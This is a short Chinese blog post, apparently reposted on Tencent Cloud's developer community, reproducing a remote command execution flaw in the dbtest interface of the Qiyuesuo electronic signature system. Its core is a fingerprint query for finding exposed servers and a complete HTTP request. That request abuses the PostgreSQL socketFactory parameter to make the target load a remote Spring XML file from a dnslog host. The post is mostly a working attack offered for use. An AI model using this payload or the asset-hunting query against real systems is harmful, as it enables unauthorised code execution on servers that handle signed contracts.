首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >【漏洞复现】契约锁电子签章系统dbtest接口存在远程命令执行漏洞

【漏洞复现】契约锁电子签章系统dbtest接口存在远程命令执行漏洞

作者头像
熔城Sec
发布2026-07-22 19:51:15
发布2026-07-22 19:51:15
870
举报

漏洞描述

契约锁电子签章系统dbtest接口存在远程命令执行漏洞

资产收集

代码语言:javascript
复制
鹰图平台
web.similar_id="f7122cd913fc451f5929b0b689d4b7d8"

发送请求

代码语言:javascript
复制
GET /setup/dbtest?db=POSTGRESQL&host=localhost&port=5511&username=root&name=test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://XXX.XXX.dnslog.cn/1.xml HTTP/1.1
Host: xx.xx.xx.xxx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

返回dnslog请求记录

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2025-11-03,如有侵权请联系 cloudcommunity@tencent.com 删除
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档